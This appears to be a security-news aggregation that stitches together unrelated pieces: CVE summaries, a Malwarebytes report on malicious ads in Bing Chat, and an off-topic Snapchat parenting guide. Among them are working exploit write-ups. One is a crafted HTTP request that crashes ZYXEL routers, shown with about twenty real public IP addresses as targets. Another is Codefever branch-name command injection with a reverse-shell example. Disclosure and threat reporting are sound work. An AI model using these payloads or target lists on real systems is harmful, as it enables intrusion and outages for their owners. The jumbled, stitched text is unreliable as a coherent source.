A remote code execution (RCE) vulnerability via an insecure file upload exists in gugoan's Economizzer v.0.9-beta1 and commit 3730880 (April 2023). A malicious attacker can upload a PHP web shell as an attachment when adding a new cash book entry. Afterwards, the attacker may visit the web shell and execute arbitrary commands.

** Economizzer**

Economizzer is a simple and open source personal finance manager system made in PHP Yii Framework 2.

It is available in the following languages: English, Spanish, Portuguese, Russian, Korean, Hungarian and French.

Learn more the features on the official website: www.economizzer.org

**Live Demo**

You can try: www.economizzer.org/web

> Use the user "joe" and password "123456".

**Requirements**

The minimum requirement by this application that your Web server supports PHP 5.4.0 and either apache2 or nginx.

> Required libraries: libapache2-mod-php, php-mbstring, php-xml, php-curl

**Installation**

    git clone https://github.com/gugoan/economizzer.git
    cd economizzer
    composer install
    

**Configuration**

In folder **economizzer/config/db.php** set as follows:

return \[
    'class' => 'yii\\db\\Connection',
    'dsn' => 'mysql:host=127.0.0.1;dbname=economizzer',
    'username' => 'USER',
    'password' => 'PASSWORD',
    'charset' => 'utf8',
    'enableSchemaCache' => true,
\];

And import the database sql file

> economizzer.sql

To test, go to **http://yourserver/economizzer/web** with user and password below:

> Use the user "joe" and password "123456".

**Contribution**

Please see CONTRIBUTING.

**License**

Economizzer is Copyright © 2014 Gustavo G. Andrade. It is free software, and may be redistributed under the terms specified in the LICENSE file.

**Donations**

To encourage the developer with new enhancements, web hosting costs, or even to buy him a good beer, support the project by making a donation.

**Thanks to**

CVE-2023-38874: GitHub - gugoan/economizzer: Open Source Personal Finance Manager

Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber 1.3.4 and prior. A patch is available and anticipated to be part of the 2.x branch.

**Microweber Cross-site Scripting vulnerability**

Moderate severity GitHub Reviewed Published Sep 28, 2023 to the GitHub Advisory Database • Updated Sep 28, 2023

GHSA-rgf9-j7gv-rq22: Microweber Cross-site Scripting vulnerability

WebCatalog before 49.0 is vulnerable to Incorrect Access Control. WebCatalog calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource, in some circumstances.

**CVE-2023-42222****Vulnerability summary**

WebCatalog before version 48.4.0 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource, in some circumstances. This vulnerability allows an attacker to execute code on the victims machine by sending messages containing links with arbitrary protocols. The victim has to interact with the link and sees the URL that is opened.

**Vulnerability Scan output**

**PoC Overview**

**PoC information**

The vulnerability can be confirmed by syncing a page that allows arbitary URLs. If a website is synced that contains search-ms://query=PsExec.exe&crumb=location://live.sysinternals.com/tools then an external SMB connection is created. This can then be used to bypass security protections on the local machine and present malicious files to the user, which would usually be blocked.

CVE-2023-42222: GitHub - itssixtyn3in/CVE-2023-42222

Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 2.0.

CVE-2023-5244: huntr – Security Bounties for any GitHub repository

Categories: Threat Intelligence
Tags: bing chat

Tags: AI

Tags: malvertising

Tags: ads

Users looking for software downloads may be tricked into visiting malicious websites via their interaction with Bing Chat.



(Read more...)




The post Malicious ad served inside Bing's AI chatbot appeared first on Malwarebytes Labs.

In February 2023, Microsoft disclosed its new AI-assisted search engine, Bing Chat, powered by OpenAI's GPT-4. Even though Google has been dominating the search industry for years, this event was significant enough to generate not only interest but also plant the seed for a possible change in the balance in the future.

Considering that tech giants make most of their revenue from advertising, it wasn't surprising to see Microsoft introduce ads into Bing Chat shortly after its release. However, online ads have an inherent risk attached to them. In this blog, we show how users searching for software downloads can be tricked into visiting malicious sites and installing malware directly from a Bing Chat conversation. 

**Malvertising via a Bing Chat conversation**

Bing Chat is an interactive text and image application that provides a very different experience for online searches. After six months of it being public, Microsoft celebrated user engagement with over one billion chats.

Ads can be inserted into a Bing Chat conversation in various ways. One of those is when a user hovers over a link and an ad is displayed first before the organic result. In the example below, we asked where we could download a program called Advanced IP Scanner used by network administrators. When we place our cursor over the first sentence, a dialog appears showing an ad and the official website for this program right below it:

Users have the choice of visiting either link, although the first one may be more likely to be clicked on because of its position. Even though there is a small 'Ad' label next to this link, it would be easy to miss and view the link as a regular search result.

**Phishing site serves malware**

Upon clicking the first link, users are taken to a website (_mynetfoldersip\[.\]cfd_) whose purpose is to filter traffic and separate real victims from bots, sandboxes, or security researchers. It does that by checking your IP address, time zone, and various other system settings such as web rendering that identifies virtual machines.

Real humans are redirected to a fake site (_advenced-ip-scanner\[.\]com_) that mimics the official one while others are sent to a decoy page. The next step is for victims to download the supposed installer and run it.

The MSI installer contains three different files but only one is malicious and is a heavily obfuscated script:

Upon execution, the script reaches out to an external IP address (_65.21.119\[.\]59_) presumably to announce itself and receive an additional payload.

**Search evolves, malicious ads follow**

Threat actors continue to leverage search ads to redirect users to malicious sites hosting malware. While Bing Chat is a different search experience, it serves some of the same ads seen via a traditional Bing query.

In this case, the malicious actor hacked into the ad account of a legitimate Australian business and created two malicious ads, one targeting network admins (Advanced IP Scanner) and another lawyers (MyCase law manager):

With convincing landing pages, victims can easily be tricked into downloading malware and be none the wiser.

We recommend users pay particular attention to the websites they visit but also use a number of security tools to get additional protection. Malwarebytes provides security software for both consumers and businesses that includes web protection, ad blocking and malware detection.

This security incident was reported to Microsoft along with a few other related malicious ads.

**Indicators of Compromise**

Ad URL and cloaker

mynetfoldersip\[.\]cfd

Fake website

advenced-ip-scanner\[.\]com

Malicious MSI

ca83b930c2b34a167a39dc04c7917b9f360a95586bce45842868af6b9ad849a2

Script C2

65.21.119\[.\]59

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Malicious ad served inside Bing's AI chatbot

By Owais Sultan
Snapchat is a platform that may not be suitable for everyone, especially if the user is an underage child. So, what can you do?
This is a post from HackRead.com Read the original post: Snapchat Safety for Parents: How to Safeguard Your Child

Here are some important steps and guidelines that are essential for parents whose children use social media, especially platforms like Snapchat.

In this digital age, social media platforms like Snapchat and **TikTok** have become an integral part of our lives, especially for the younger generation. While Snapchat offers a unique way to connect with friends, it also raises concerns for parents regarding their child’s online safety.

As a parent, you might be wondering, “How can I protect my child on Snapchat?” This article will provide you with a comprehensive guide to keeping your child safe while using this popular platform.

However, before we begin, it’s important to note that Snapchat’s age restriction allows only children aged 13 and above to register an account. Nevertheless, considering the type of content and abusive incidents related to children on Snapchat, it is advisable to ensure that kids aged 18 and above are the only ones allowed to use the platform.

In fact, CBC Canada recently published an **article** titled “Child Luring and Exploitation on the Rise Through Snapchat” that delves deeply into the issue, shedding light on how children are increasingly exposed to and exploited on Snapchat.

****Understanding the Snapchat Landscape****

Before we delve into safety measures, it’s crucial to understand how Snapchat works. Snapchat allows users to send photos and videos that disappear after a short period, providing a sense of privacy. However, it also offers features like Stories and Discover, where users can share content with their friends or the public.

****Setting Privacy Settings****

One of the first steps in safeguarding your child on Snapchat is configuring their privacy settings. Here’s what you need to do:

**1\. Enable Ghost Mode**

Ghost Mode is a feature that hides your child’s location on the Snap Map. To enable this feature, go to your child’s profile, click on the gear icon, select ‘See My Location,’ and choose ‘Ghost Mode.’ This prevents their location from being visible to others.

**2\. Limit Who Can Send Snaps**

Ensure that only friends can send snaps to your child. To do this, go to ‘Settings,’ then ‘Who Can…’ and set ‘Send Me Snaps’ to ‘My Friends.’ This reduces the chances of strangers sending unsolicited snaps.

**3\. Control Who Can View Their Story**

To maintain a tighter circle around your child’s Snapchat activity, set ‘View My Story’ to ‘My Friends’ in the ‘Who Can…’ section under ‘Settings.’ This way, only trusted individuals can view their stories.

****Educating Your Child About Strangers****

Snapchat is a platform where your child can receive friend requests from strangers. It’s crucial to teach them not to accept requests from people they don’t know personally. Remind them that not everyone on the internet has good intentions, and sharing personal information can lead to risks.

****Utilizing Parental Control Apps****

**Consider using parental control apps** to further enhance your child’s online safety and monitor your child’s Snapchat without them knowing. These apps allow you to set screen time limits, track your child’s online activity, and receive alerts if they engage in potentially harmful behavior on Snapchat.

****Encouraging Open Communication****

Maintaining open communication with your child is paramount. Make sure your child knows they can approach you with any concerns or uncomfortable experiences on Snapchat. A trusting relationship will make it easier for your child to seek help when needed.

****Monitoring Their Activity****

While trust is essential, it’s also wise to monitor your child’s Snapchat activity discreetly. You can do this by:

**1\. Adding Them as a Friend**

By adding your child as a friend on Snapchat, you can view their snaps and stories without them knowing. This allows you to keep an eye on their interactions without invading their privacy.

**2\. Checking Their Friends List**

Regularly review your child’s friends list to ensure they only have real-life friends added. If you notice any unfamiliar usernames, inquire about them. This helps in identifying potential risks.

****Teaching Responsible Posting****

Snapchat encourages sharing moments, but your child should be aware of the consequences of oversharing. Remind them not to post sensitive information, such as their location or personal details, and to avoid sharing inappropriate content. Once something is online, it’s challenging to remove it entirely.

****Conclusion****

In conclusion, ensuring your child’s safety on Snapchat and other platforms involves a combination of setting privacy settings, educating them about online dangers, maintaining open communication, discreetly monitoring their activity, teaching responsible posting, and using parental control apps. By taking these proactive steps, you can provide a secure environment for your child to enjoy social media responsibly.

Remember that staying involved in your child’s online world is the key to their safety. By being aware of their Snapchat usage and providing guidance, you can help them make informed choices and navigate the digital landscape with confidence.

****RELATED ARTICLES****

Teen girl facing up to 10 years for sending nude selfie

Student uses Snapchat’s gender filter to bust pervert cop

9 risky apps that you need to monitor on your kids’ smartphone

Microsoft’s new tool detects, reports pedophiles from online chats

Snapchat Safety for Parents: How to Safeguard Your Child

Buffer Overflow vulnerability in ZYXEL ZYXEL v.PMG2005-T20B allows a remote attacker to cause a denial of service via a crafted script to the uid parameter in the cgi-bin/login.asp component.

**Rumble**

ZYXEL-PMG2005-T20B has a denial of service vulnerability.Buffer Overflow vulnerability in ZYXEL ZYXEL v.PMG2005-T20B allows a remote attacker to cause a denial of service via a crafted script to the uid parameter in the cgi-bin/login.asp component.

Zyxel is a leading global provider of comprehensive communication and information solutions, providing innovative technology and product solutions for telecom operators, government and enterprise customers, and consumers worldwide. ZYXEL-PMG2005-T20B has a denial of service vulnerability. Attackers can exploit this vulnerability to cause the browser to crash.

Triggered process：Using a valid SESSIONID of the ZYXEL-PMG2005-T20B product, when the number of admin in the uid reaches 50, backend parsing can cause any web application of the product ZYXEL-PMG2005-T20B to crash.

The following are the details of the vulnerability:  
1.Vulnerability Address：http://177.221.16.243/cgi-bin/login.asp  
Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 177.221.16.243  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://177.221.16.243/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution  
2.Vulnerability Address：http://179.191.53.240/cgi-bin/login.asp  
Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 179.191.53.240  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://179.191.53.240/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution  
3.  
Vulnerability Address：http://179.191.53.133/cgi-bin/login.asp

Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 179.191.53.133  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://179.191.53.133/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution

Vulnerability Address：http://177.221.17.76/cgi-bin/login.asp  
Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 177.221.17.76  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://177.221.17.76/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie:SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution

5.Vulnerability Address：http://187.111.205.144/cgi-bin/login.asp  
6.Vulnerability Address：http://179.191.53.138/cgi-bin/login.asp  
7.Vulnerability Address：http://187.111.205.157/cgi-bin/login.asp  
8.Vulnerability Address：http://189.36.156.42/cgi-bin/login.asp  
9.Vulnerability Address：http://179.191.53.15/cgi-bin/login.asp  
10.Vulnerability Address：http://45.182.161.27/cgi-bin/login.asp  
11.Vulnerability Address：http://45.182.161.46/cgi-bin/login.asp  
12.Vulnerability Address：http://45.182.161.42/cgi-bin/login.asp  
13.Vulnerability Address：http://45.182.161.47/cgi-bin/login.asp  
14.Vulnerability Address：http://45.182.161.43/cgi-bin/login.asp  
15.Vulnerability Address：http://45.182.161.25/cgi-bin/login.asp  
16.Vulnerability Address：http://179.191.53.89/cgi-bin/login.asp  
17.Vulnerability Address：http://179.107.195.230/cgi-bin/login.asp  
18.Vulnerability Address：http://45.182.161.41/cgi-bin/login.asp  
19.Vulnerability Address：http://45.182.161.33/cgi-bin/login.asp  
20.Vulnerability Address：http://45.182.161.45/cgi-bin/login.asp

Request package is：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: IP  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://IP/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie:SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Replacing the above two IPs with the target IP can cause the browser to crash

The following is a vulnerability replay video:  
https://github.com/Rumble00/Rumble/assets/145107465/c1ad7082-513f-427f-9706-30c75097d586

CVE-2023-43314: ZYXEL-PMG2005-T20B has a denial of service vulnerability · Issue #1 · Rumble00/Rumble

A stored cross-site scripting (XSS) vulnerability in the cms/content/edit component of YZNCMS v1.3.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the title parameter.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-43233: mycve/YZNCMS 1.3.0 XSS.pdf at main · yux1azhengye/mycve

JFinalCMS foreground message can be embedded malicious code saved in the database. When users browse the comments, these malicious codes embedded in the HTML will be executed, and the user's browser will be controlled by the attacker, so as to achieve the special purpose of the attacker, such as cookie theft

CVE-2023-43191: cmscve_test/README.md at main · etn0tw/cmscve_test

An issue in PGYER codefever v.2023.8.14-2ce4006 allows a remote attacker to execute arbitrary code via a crafted request to the branchList component.

**Remote Code Execution Vulnerability in Codefever up to 2023.8.14-2ce4006**

> CVE-ID: CVE-2023-44080
> 
> Attack type: Remote Code Execution
> 
> FOFA Keyword: icon\_hash="-391103642"
> 
> Date: August 13, 2023
> 
> Exploit Author: pyy
> 
> Vendor Homepage: https://www.pgyer.com/ https://codefever.pgyer.com/
> 
> Software Link: https://github.com/PGYER/codefever
> 
> Version: up to 2023.8.14-2ce4006
> 
> Suggested description of the vulnerability for use in the CVE: Codefever up to 2023.8.14-2ce4006 was discovered to contain a remote code execution (RCE) vulnerability via the component /application/controllers/api/repository.php

By default, arbitrary remote code execution (RCE) can be achieved on Codefever either by directly registering a new account(by default, Codefever allows arbitrary users to register new accounts), or by obtaining a low-privilege account on the target system which allows creating a new branch for any project.

**EXP**

The attack can be carried out by following these steps:

1.  Register an account (default abled for anyone) and Create a repository (an existing repository can also be used)
    
2.  Clone the repository and create a normal branch, then push it
    
3.  Create a branch with the branch name containing exploit code
    
    git checkout -b "&&echo\$IFS\$9{{command}}|base64\$IFS\$9-d|bash&&"
    
    The command is the base64 encoding of any command to be executed. For example, bash -c 'bash -i >& /dev/tcp/ip/port 0>&1' base64 encoded.
    
4.  Then create a pull request (press 合并请求 on the page)
    
5.  Getshell
    

**More Information**

Browse this for more information. (I can not upload photos to github gist)

Tag

#git